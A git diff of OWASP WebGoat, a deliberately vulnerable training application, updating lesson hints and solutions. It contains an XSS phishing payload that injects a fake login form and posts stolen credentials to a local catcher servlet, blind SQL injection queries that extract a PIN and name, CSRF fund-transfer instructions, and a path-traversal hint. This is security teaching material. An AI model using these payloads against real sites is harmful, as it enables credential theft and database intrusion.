-						+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
-						+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+						+ "<BR><BR>In the whole script:<BR><BR>"
+						+ "&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+						+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
 						+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
 						+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
-						+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
+						+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;<BR>"
+						+ "Also, check firebug. Does the search form need to be terminated for this to work...? (&lt;/form&gt;)");
 		hints
 				.add("You need to create the hack() function.  This function will pull the credentials from the "
 						+ "webpage and post them to the WebGoat catcher servlet. <BR>"
 						+ "<BR> Some useful code snippets:<UL>"
-						+ "<LI>doucument.forms[0].user.value - will access the user field"
+						+ "<LI>doucument.phish.user.value - will access the user field"
 						+ "<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post"
 						+ "<LI>javascript string concatentation uses a \"+\" </UL>"
-						+ "<BR><BR>Solution for this hint():<BR><BR>"
-						+ "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
-						+ "\nUser Name = &quot; + document.forms[0].user.value + &quot;\nPassword = &quot; +  document.forms[0].pass.value); "
-						+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost/WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
-						+ "document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}"
+						+ "<BR><BR>The entire javascript portion:<BR><BR>"
+						+ "&lt;script&gt;function hack(){ "
+						+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+						+ "document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;;"
+						+ "alert(&quot;Had this been a real attack... Your credentials were just stolen."
+						+ "\nUser Name = &quot; + document.phish.user.value + &quot;\nPassword = &quot; +  document.phish.pass.value);} "
 						+ "&lt;/script&gt;");
 		hints
 				.add("Complete solution for this lesson:<BR><BR>"
-						+ "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
-						+ "\nUser Name = &quot; + document.forms[0].user.value + &quot;\nPassword = &quot; +  document.forms[0].pass.value); "
-						+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost/WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
-						+ "document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}"
-						+ "&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
-						+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+						+ "&lt;/form&gt;&lt;script&gt;function hack(){ "
+						+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+						+ "document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;;"
+						+ "alert(&quot;Had this been a real attack... Your credentials were just stolen."
+						+ "\nUser Name = &quot; + document.phish.user.value + &quot;\nPassword = &quot; +  document.phish.pass.value);} "
+						+ "&lt;/script&gt;&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+						+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
 						+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
 						+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
 						+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
 		/**
 		 * password<script>function hack(){ alert("Had this been a real attack... Your credentials
-		 * were just stolen.\nUser Name = " + document.forms[0].user.value + "\nPassword = " +
-		 * document.forms[0].pass.value); XSSImage=new Image;
+		 * were just stolen.\nUser Name = " + document.phish.user.value + "\nPassword = " +
+		 * document.phish.pass.value); XSSImage=new Image;
 		 * XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="
-		 * +document.forms[0].user.value + "&password=" + document.forms[0].pass.value +
-		 * "";}</script><form><br>
+		 * +document.phish.user.value + "&password=" + document.phish.pass.value +
+		 * "";}</script><form name="phish"><br>
 		 * <br>
 		 * <HR>
 		 * <H3>This feature requires account login:</H2> <br>
 		 * <br>
 		 * Enter Username:<br>
-		 * <input type="text" id="user" name="user"><br>
+		 * <input type="text" name="user"><br>
 		 * Enter Password:<br>
 		 * <input type="password" name = "pass"><br>
 		 * <input type="submit" name="login" value="login" onclick="hack()"></form><br>
@@ -258,7 +261,7 @@ public class Phishing extends LessonAdapter
 				+ "Using XSS and HTML insertion, your goal is to: <UL>"
 				+ "<LI>Insert html to that requests credentials"
 				+ "<LI>Add javascript to actually collect the credentials"
-				+ "<LI>Post the credentials to http://localhost/WebGoat/catcher?PROPERTY=yes...</UL> "
+				+ "<LI>Post the credentials to http://localhost/webgoat/catcher?PROPERTY=yes...</UL> "
 				+ "To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
 
 		return (instructions);
diff --git a/webgoat/src/main/java/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java b/webgoat/src/main/java/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java
index c560621e0..2a5390752 100644
--- a/webgoat/src/main/java/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java
+++ b/webgoat/src/main/java/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java
@@ -62,8 +62,9 @@ public class DeleteProfile extends DefaultLessonAction
 
 		if (isAuthenticated(s))
 		{
+			if (userId != employeeId) {
 			deleteEmployeeProfile(s, userId, employeeId);
-
+			}
 			try
 			{
 				chainedAction.handleRequest(s);
diff --git a/webgoat/src/main/java/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java b/webgoat/src/main/java/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java
index c28554cc2..ceee7619a 100644
--- a/webgoat/src/main/java/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java
+++ b/webgoat/src/main/java/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java
@@ -68,6 +68,8 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
 		registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
 		registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
 		registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
+		
+		// This action has not yet been implemented. None of the lessons require it.
 		registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
 
 		// These actions are special in that they chain to other actions.
diff --git a/webgoat/src/main/java/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java b/webgoat/src/main/java/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java
index a072a5dfe..c840fe83e 100644
--- a/webgoat/src/main/java/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java
+++ b/webgoat/src/main/java/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java
@@ -149,7 +149,8 @@ public class SQLInjection extends GoatHillsFinancial
 			}
 			else if (STAGE2.equals(stage))
 			{
-				instructions = "Stage 2: Block SQL Injection using a Parameterized Query.<br>"
+				instructions = "Stage 2: Block SQL Injection using a Parameterized Query.<br><br>"
+						+ "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br><br>"
 						+ "Implement a fix to block SQL injection into the fields in question on the Login page. "
 						+ "Repeat stage 1.  Verify that the attack is no longer effective.";
 			}
@@ -161,7 +162,8 @@ public class SQLInjection extends GoatHillsFinancial
 			}
 			else if (STAGE4.equals(stage))
 			{
-				instructions = "Stage 4: Block SQL Injection using a Parameterized Query.<br>"
+				instructions = "Stage 4: Block SQL Injection using a Parameterized Query.<br><br>"
+						+ "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br><br>"
 						+ "Implement a fix to block SQL injection into the relevant parameter. "
 						+ "Repeat stage 3.  Verify that access to Neville's profile is properly blocked.";
 			}
diff --git a/webgoat/src/main/java/org/owasp/webgoat/lessons/SessionFixation.java b/webgoat/src/main/java/org/owasp/webgoat/lessons/SessionFixation.java
index 18fcc4680..7a872b451 100644
--- a/webgoat/src/main/java/org/owasp/webgoat/lessons/SessionFixation.java
+++ b/webgoat/src/main/java/org/owasp/webgoat/lessons/SessionFixation.java
@@ -245,7 +245,7 @@ public class SessionFixation extends SequentialLessonAdapter
 				+ "During the last week we had a few problems with our database. "
 				+ "We have received many complaints regarding incorrect account details. "
 				+ "Please use the following link to verify your account "
-				+ "data:<br><br><center><a href=/WebGoat/"
+				+ "data:<br><br><center><a href=/webgoat/"
 				+ link
 				+ "> Goat Hills Financial</a></center><br><br>"
 				+ "We are sorry for the any inconvenience and thank you for your cooparation.<br><br>"
diff --git a/webgoat/src/main/java/org/owasp/webgoat/lessons/SqlStringInjection.java b/webgoat/src/main/java/org/owasp/webgoat/lessons/SqlStringInjection.java
index 3cf57aaa2..3ccd0bc97 100644
--- a/webgoat/src/main/java/org/owasp/webgoat/lessons/SqlStringInjection.java
+++ b/webgoat/src/main/java/org/owasp/webgoat/lessons/SqlStringInjection.java
@@ -141,7 +141,7 @@ public class SqlStringInjection extends SequentialLessonAdapter
 	{
 		ElementContainer ec = new ElementContainer();
 
-		ec.addElement(WebGoatI18N.get("StringSqlInjectioNSecondStage"));
+		ec.addElement(WebGoatI18N.get("StringSqlInjectionSecondStage"));
 		if (s.getParser().getRawParameter(ACCT_NAME, "YOUR_NAME").equals("restart"))
 		{
 			getLessonTracker(s).getLessonProperties().setProperty(STAGE, "1");
diff --git a/webgoat/src/main/java/org/owasp/webgoat/lessons/WSDLScanning.java b/webgoat/src/main/java/org/owasp/webgoat/lessons/WSDLScanning.java
index 3daba76c0..a3fcd219d 100644
--- a/webgoat/src/main/java/org/owasp/webgoat/lessons/WSDLScanning.java
+++ b/webgoat/src/main/java/org/owasp/webgoat/lessons/WSDLScanning.java
@@ -118,7 +118,7 @@ public class WSDLScanning extends LessonAdapter
 		hints.add("Try connecting to the WSDL with a browser or Web Service tool.");
 		hints.add("Sometimes the WSDL will define methods that are not available through a web API. "
 				+ "Try to find operations that are in the WSDL, but not part of this API");
-		hints.add("The URL for the web service is: http://localost/WebGoat/services/WSDLScanning <br>"
+		hints.add("The URL for the web service is: http://localhost/webgoat/services/WSDLScanning <br>"
 				+ "The WSDL can usually be viewed by adding a ?WSDL on the end of the request.");
 		hints.add("Look in the WSDL for the getCreditCard operation and insert the field in an intercepted request.");
 		return hints;
diff --git a/webgoat/src/main/resources/WebGoatLabels_english.properties b/webgoat/src/main/resources/WebGoatLabels_english.properties
index c3bee7ec3..e10085eab 100644
--- a/webgoat/src/main/resources/WebGoatLabels_english.properties
+++ b/webgoat/src/main/resources/WebGoatLabels_english.properties
@@ -82,7 +82,7 @@ FileTooLarge=File is too large
 FileBinary=File is binary
 TheFollowingError=The following error occurred while accessing the file: <
 PathBasedAccessControlInstr1=The '
-PathBasedAccessControlInstr2=' user has access to all the files in the lesson_plans/English directory.  Try to break the access control mechanism and access a resource that is not in the listed directory.  After selecting a file to view, WebGoat will report if access to the file was granted.  An interesting file to try and obtain might be a file like tomcat/conf/tomcat-users.xml
+PathBasedAccessControlInstr2=' user has access to all the files in the lesson_plans/English directory.  Try to break the access control mechanism and access a resource that is not in the listed directory.  After selecting a file to view, WebGoat will report if access to the file was granted.  An interesting file to try and obtain might be a file like tomcat/conf/tomcat-users.xml. Remember that file paths will be different if using the WebGoat source.
 ErrorGenerating=Error generating 
 ViewingFile=Viewing file:
 File=File: 
diff --git a/webgoat/src/main/webapp/images/header/header.jpg b/webgoat/src/main/webapp/images/header/header.jpg
index 2e7acbad7..d5c71eeba 100644
Binary files a/webgoat/src/main/webapp/images/header/header.jpg and b/webgoat/src/main/webapp/images/header/header.jpg differ
diff --git a/webgoat/src/main/webapp/images/logos/Thumbs.db b/webgoat/src/main/webapp/images/logos/Thumbs.db
new file mode 100644
index 000000000..ac16b0730
Binary files /dev/null and b/webgoat/src/main/webapp/images/logos/Thumbs.db differ
diff --git a/webgoat/src/main/webapp/images/logos/seleucus.png b/webgoat/src/main/webapp/images/logos/seleucus.png
new file mode 100644
index 000000000..f95c1dce4
Binary files /dev/null and b/webgoat/src/main/webapp/images/logos/seleucus.png differ
diff --git a/webgoat/src/main/webapp/lesson_plans/English/BufferOverflow.html b/webgoat/src/main/webapp/lesson_plans/English/BufferOverflow.html
deleted file mode 100644
index b25b4f944..000000000
--- a/webgoat/src/main/webapp/lesson_plans/English/BufferOverflow.html
+++ /dev/null
@@ -1,9 +0,0 @@
-<div align="Center">
-<p><b>Lesson Plan Title:</b> How to Exploit Buffer Overflows</p>
-</div>
-<!-- Start Instructions -->
-<p><b>Concept / Topic To Teach:</b> </p>
-How to Exploit Buffer Overflows.
-<p><b>General Goal(s):</b> </p>
-This lesson needs a creator!
-<!-- Stop Instructions -->
\ No newline at end of file
diff --git a/webgoat/src/main/webapp/lesson_plans/English/CSRF.html b/webgoat/src/main/webapp/lesson_plans/English/CSRF.html
index dc17ddef9..594d049bd 100644
--- a/webgoat/src/main/webapp/lesson_plans/English/CSRF.html
+++ b/webgoat/src/main/webapp/lesson_plans/English/CSRF.html
@@ -21,6 +21,6 @@ In this way, the attacker can make the victim perform actions that they didn't i
 </div>
 <p><b>General Goal(s):</b> </p>
 <!-- Start Instructions -->
-Your goal is to send an email to a newsgroup that contains an image whose URL is pointing to a malicious request. Try to include a 1x1 pixel image that includes a URL. The URL should point to the CSRF lesson with an extra parameter "transferFunds=4000". You can copy the shortcut from the left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever receives this email and happens to be authenticated at that time will have his funds transferred. When you think the attack is successful, refresh the page and you will find the green check on the left hand side menu.
+Your goal is to send an email to a newsgroup that contains an image whose URL is pointing to a malicious request. Try to include a 1x1 pixel image that includes a URL. The URL should point to the CSRF lesson with an extra parameter "transferFunds=4000". You can copy the shortcut from the left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever receives this email and happens to be authenticated at that time will have his funds transferred. When you think the attack is successful, refresh the page and you will find the green check on the left hand side menu.<br/><b>Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.</b>
 <!-- Stop Instructions -->
 
diff --git a/webgoat/src/main/webapp/lesson_plans/English/CsrfPromptByPass.html b/webgoat/src/main/webapp/lesson_plans/English/CsrfPromptByPass.html
index a5b524be2..7a505f2ac 100644
--- a/webgoat/src/main/webapp/lesson_plans/English/CsrfPromptByPass.html
+++ b/webgoat/src/main/webapp/lesson_plans/English/CsrfPromptByPass.html
@@ -27,6 +27,7 @@ parameter "transferFunds=4000", and "transferFunds=CONFIRM". You can copy the sh
 left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever 
 receives this email and happens to be authenticated at that time will have his funds transferred. 
 When you think the attack is successful, refresh the page and you will find the green check on 
-the left hand side menu.
+the left hand side menu.<br/>
+<b>Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.</b>
 <!-- Stop Instructions -->
 
diff --git a/webgoat/src/main/webapp/lesson_plans/English/CsrfTokenByPass.html b/webgoat/src/main/webapp/lesson_plans/English/CsrfTokenByPass.html
index b0cbe426d..b57ea6b83 100644
--- a/webgoat/src/main/webapp/lesson_plans/English/CsrfTokenByPass.html
+++ b/webgoat/src/main/webapp/lesson_plans/English/CsrfTokenByPass.html
@@ -31,7 +31,8 @@ request to transfer funds.  To successfully complete you need to obtain a valid
 The page that presents the transfer funds form contains a valid request token.  The URL for the 
 transfer funds page is the same as this lesson with an extra parameter "transferFunds=main". Load 
 this page, read the token and append the token in a forged request to transferFunds. When you think
-the attack is successful, refresh the page and you will find the green check on the left hand side menu.
+the attack is successful, refresh the page and you will find the green check on the left hand side menu.<br/>
+<b>Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.</b>
 <!-- Stop Instructions -->
 
 
diff --git a/webgoat/src/main/webapp/lesson_plans/English/HowToWork.html b/webgoat/src/main/webapp/lesson_plans/English/HowToWork.html
index 94cb85851..551f7cb32 100644
--- a/webgoat/src/main/webapp/lesson_plans/English/HowToWork.html
+++ b/webgoat/src/main/webapp/lesson_plans/English/HowToWork.html
@@ -33,17 +33,11 @@ solution for complete details.</p>
 <p>
 To read and edit Parameters you need a local proxy to intercept the HTTP request. 
 Here we use WebScarab. More information on WebScarab can be found in the "Useful Tools" Chapter.
-After installing WebScarab and configuring your browser to use it as proxy on localhost we can start.<br><br>
-<img src="images/introduction/HowToUse_1.jpg"><br><br>
-We have to select "Intercept Request" in the tab "Intercept". If we send a HTTP request we get a new WebScarab window.<br><br>
-<img src="images/introduction/HowToUse_2.jpg"><br><br>
-Here we can read and edit the intercepted parameter. After "Accept changes" the request will be sent to the server.
 </p>
 <h2>Read And Edit Cookies</h2>
 <p>
-Often it is not only necessary to change the value of the parameters but to change the value of cookies. 
-We can use WebScarab to intercept the request and change cookies values just like parameter data as explained in the last topic.<br><br>
-<img src="images/introduction/HowToUse_3.jpg"><br><br>
-We get a new window on sending a HTTP request. On the screenshot you see where we can find cookies and how to edit the values of them.
+Often it is not only necessary to change the value of the parameters but to change the value of cookies.
+WebScarab has functionality for this as well.
+
 </p>
 <!-- Stop Instructions -->
diff --git a/webgoat/src/main/webapp/lesson_plans/English/HttpSplitting.html b/webgoat/src/main/webapp/lesson_plans/English/HttpSplitting.html
index ac0906a93..bf042b323 100644
--- a/webgoat/src/main/webapp/lesson_plans/English/HttpSplitting.html
+++ b/webgoat/src/main/webapp/lesson_plans/English/HttpSplitting.html
@@ -30,5 +30,6 @@ Date: Fri, 30 Dec 2005 17:32:47 GMT</blockquote>
 <!-- Start Instructions -->
 <p>This lesson has two stages. Stage 1 teaches you how to do HTTP Splitting attacks while stage 2 builds on that to teach you how to elevate HTTP Splitting to Cache Poisoning.</p>
 <p>Enter a language for the system to search by. You will notice that the application is redirecting your request to another resource on the server. You should be able to use the CR (%0d) and LF (%0a) characters to exploit the attack. Your goal should be to force the server to send a 200 OK. If the screen changed as an effect to your attack, just go back to the homepage. After stage 2 is exploited successfully, you will find the green check in the left menu.</p>
+<p>You may find the <a href="http://yehg.net/encoding/">PHP Charset Encoder</a> useful. The Encode and DecodeURIComponent buttons translate CR and LF.</p>
 <!-- Stop Instructions -->
 
diff --git a/webgoat/src/main/webapp/lesson_plans/English/OffByOne.html b/webgoat/src/main/webapp/lesson_plans/English/OffByOne.html
new file mode 100644
index 000000000..53bd06d01
--- /dev/null
+++ b/webgoat/src/main/webapp/lesson_plans/English/OffByOne.html
@@ -0,0 +1,21 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> How to Exploit "Off-by-One" Buffer Overflow Vulnerabilities</p>
+</div>
+<p><b>Concept / Topic To Teach:</b></p>
+How to Exploit a Web Based "Off-by-One" Buffer Overflow.
+<br>
+<div align="Left">
+<p><b>How the attack works:</b>
+</p>
+Despite being more rare, buffer overflow vulnerabilities on the web occur when a tier of the application has insufficient memory allocated to deal with the data submitted by the user. Typically, such a tier would be written in C or a similar language. 
+
+For the particular subset, namely, off-by-one overflows, this lesson focuses on the consequences of being able to overwrite the position for the trailing null byte. 
+
+As a result, further information is returned back to the user, due to the fact that no null byte was found.
+</div>
+<p><b>Lesson Goal(s):</b> </p>
+<!-- Start Instructions -->
+<p>Welcome to the <b>OWASP Hotel</b>! Can you find out which room a VIP guest is staying in?</p>
+<!-- Stop Instructions -->
+* Understand how a buffer overflow vulnerability can be triggered on a web application.<br>
+* Understand what type of value lengths are likely to trigger a buffer overflow.<br>
\ No newline at end of file
diff --git a/webgoat/src/main/webapp/lesson_plans/English/UsefulTools.html b/webgoat/src/main/webapp/lesson_plans/English/UsefulTools.html
index e69db2dce..7c23aa847 100644
--- a/webgoat/src/main/webapp/lesson_plans/English/UsefulTools.html
+++ b/webgoat/src/main/webapp/lesson_plans/English/UsefulTools.html
@@ -12,6 +12,15 @@ operates as an intercepting proxy, we can review and modify requests
 and responses.<br><br>
 <img src="images/introduction/webscarab.jpg"><br><br>
 Webpage:<a href="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project">http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project</a>
+<br>The .jar install file can be found at the <a href="http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=61823">OWASP Sourceforge Page</a></p>
+<p>After installing WebScarab and configuring your browser to use it as proxy on localhost we can start. If you are using localhost for your Tomcat server, remember to <a href="https://www.owasp.org/index.php/WebScarab_Getting_Started">put a "." after the hostname when browsing to WebGoat</a>.<br><br>
+<img src="images/introduction/HowToUse_1.jpg"><br><br>
+We have to select "Intercept Request" in the tab "Intercept". If we send a HTTP request we get a new WebScarab window.<br><br>
+<img src="images/introduction/HowToUse_2.jpg"><br><br>
+Here we can read and edit the intercepted parameter. After "Accept changes" the request will be sent to the server.<br><br>
+WebScarab is also used to intercept the request and change cookies values just like parameter data:<br><br>
+<img src="images/introduction/HowToUse_3.jpg"><br><br>
+We get a new window on sending a HTTP request. On the screenshot you see where we can find cookies and how to edit their values.
 </p>
 <h2>Firebug:</h2>
 <p>
diff --git a/webgoat/src/main/webapp/lesson_solutions/BasicAuthentication.html b/webgoat/src/main/webapp/lesson_solutions/BasicAuthentication.html
index cebd41567..5d888cf5f 100644
--- a/webgoat/src/main/webapp/lesson_solutions/BasicAuthentication.html
+++ b/webgoat/src/main/webapp/lesson_solutions/BasicAuthentication.html
@@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
 <meta name=ProgId content=Word.Document>
 <meta name=Generator content="Microsoft Word 12">
 <meta name=Originator content="Microsoft Word 12">
+<title>Basic Authentication</title>
 <link rel=File-List href="lesson_solutions/BasicAuthentication_files/filelist.xml">
 <link rel=Edit-Time-Data href="lesson_solutions/BasicAuthentication_files/editdata.mso">
 <!--[if !mso]>
diff --git a/webgoat/src/main/webapp/lesson_solutions/BlindNumericSqlInjection.html b/webgoat/src/main/webapp/lesson_solutions/BlindNumericSqlInjection.html
new file mode 100644
index 000000000..45eb33e58
--- /dev/null
+++ b/webgoat/src/main/webapp/lesson_solutions/BlindNumericSqlInjection.html
@@ -0,0 +1,46 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution: Blind Numeric SQL Injection</title>
+<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> Blind Numeric SQL Injection</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack. 
+<br><br>
+Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.<br>
+<br>
+It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.<br>
+<br>
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+The form below allows a user to enter an account number and determine if it is valid or not. Use this form to develop a true / false test check other entries in the database.<br/>
+
+The goal is to find the value of the field pin in table pins for the row with the cc_number of 1111222233334444. The field is of type int, which is an integer.<br/>
+
+Put the discovered pin value in the form to pass the lesson.
+</p>
+
+<b>Solution:</b><br/><br/>
+In this lesson, the only output returned by the webpage is whether a given account exists or not. Therefore, we cannot simply request the pin number for this account.<br/>
+We can take advantage of the query being used, however. The database query being used is:<br/>
+SELECT * FROM user_data WHERE userid=<b>accountNumber</b>;<br/><br/>
+If this query returns information for the account, the page will indicate the account exists. However, if the userid doesnt exist, no data is returned and the page says the account is invalid.
+By using the AND function, we can add additional conditions to this query. If the additional condition is true, the result will be a valid account, if not the page will indicate the account is invalid.<br/>
+For example, try entering these two commands for the account ID:<br/>
+<b>101 AND 1=1</b> and <b>101 AND 1=2</b><br/><br/>
+In the first statement, both conditions return true. Account 101 is found and 1=1, so the page indicates the account is valid.<br/>
+In the second statement, only the first condition is true. Account 101 is found but 1 does not equal 2, so the page indicates the account is invalid.<br/><br/>
+Now, we can use a more complicated command for our second true/false statement. The following statement will tell us if the pin is above or below 10000:<br/>
+<b>101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 10000 );</b><br/><br/>
+If our command returns false, it makes the entire statement false and returns and invalid account, which indicates the pin number is below 10000. If it is above 10000, the opposite is true.<br/><br/>
+The last step is to repeatedly use this command with a different number to the right of the > operator until we can determine the pin number.<br/>
+The pin number is <b>2364</b>. Enter this number to complete the lesson.
+
+
+</body>
+</html>
\ No newline at end of file
diff --git a/webgoat/src/main/webapp/lesson_solutions/BlindSqlInjection.html b/webgoat/src/main/webapp/lesson_solutions/BlindSqlInjection_files/BlindStringSqlInjection.htmlSOLBAK
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/BlindSqlInjection.html
rename to webgoat/src/main/webapp/lesson_solutions/BlindSqlInjection_files/BlindStringSqlInjection.htmlSOLBAK
diff --git a/webgoat/src/main/webapp/lesson_solutions/BlindStringSqlInjection.html b/webgoat/src/main/webapp/lesson_solutions/BlindStringSqlInjection.html
new file mode 100644
index 000000000..844892b9d
--- /dev/null
+++ b/webgoat/src/main/webapp/lesson_solutions/BlindStringSqlInjection.html
@@ -0,0 +1,42 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution: Blind String SQL Injection</title>
+<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> Blind String SQL Injection</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack. 
+<br><br>
+Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.<br>
+<br>
+It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.<br>
+<br>
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+The form below allows a user to enter an account number and determine if it is valid or not. Use this form to develop a true / false test check other entries in the database.<br/>
+
+The goal is to find the value of the field name in table pins for the row with the cc_number of 4321432143214321. The field is of type varchar, which is a string.<br/>
+
+Put the discovered name in the form to pass the lesson. Only the discovered name should be put into the form field, paying close attention to the spelling and capitalization.<br/>
+</p>
+
+<b>Solution:</b><br/><br/>
+This lesson is conceptually very similar to the previous lesson. The big difference is we are searching for a string, not a number.<br/>
+We will attempt to figure out the name the same way, by injecting a boolean expression into the pre-scripted SQL query. It looks similar to the one from the previous lesson:<br/>
+<b>101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) < 'H' );</b><br/><br/>
+We can compare characters the same way we can compare numbers. For example, N > M. However, without the SUBSTRING method, we are attempting to compare the entire string to one letter, which doesn't help us. The substring method has the following syntax:<br/>
+<b>SUBSTRING(STRING,START,LENGTH)</b><br/><br/>
+The expression above compares the first letter to H. It will return false and show invalid account number. Changing the boolean expression to <b>< 'L'</b> returns true, so we know the letter is between H and L. With a few more queries, we can determine the first letter is <b>J</b>. Note that capitalization matters, and it's right to assume the first letter is capitalized.<br/><br/>
+To determine the second letter, we have to change the SUBSTRING parameters to compare against the second letter. We can use this command:<br/>
+<b>101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), <u>2</u>, 1) < '<u>h</u>' );</b><br/><br/>
+Using several more queries, we can determine the second letter is <b>i</b>. Note that we are comparing the second character to a lowercase h. Continue this process until you have the rest of the letters.
+The name is <b>Jill</b>. Enter this name to complete the lesson. Capitalization matters.
+
+
+</body>
+</html>
\ No newline at end of file
diff --git a/webgoat/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions.html b/webgoat/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions.html
new file mode 100644
index 000000000..a0a7d4a84
--- /dev/null
+++ b/webgoat/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions.html
@@ -0,0 +1,37 @@
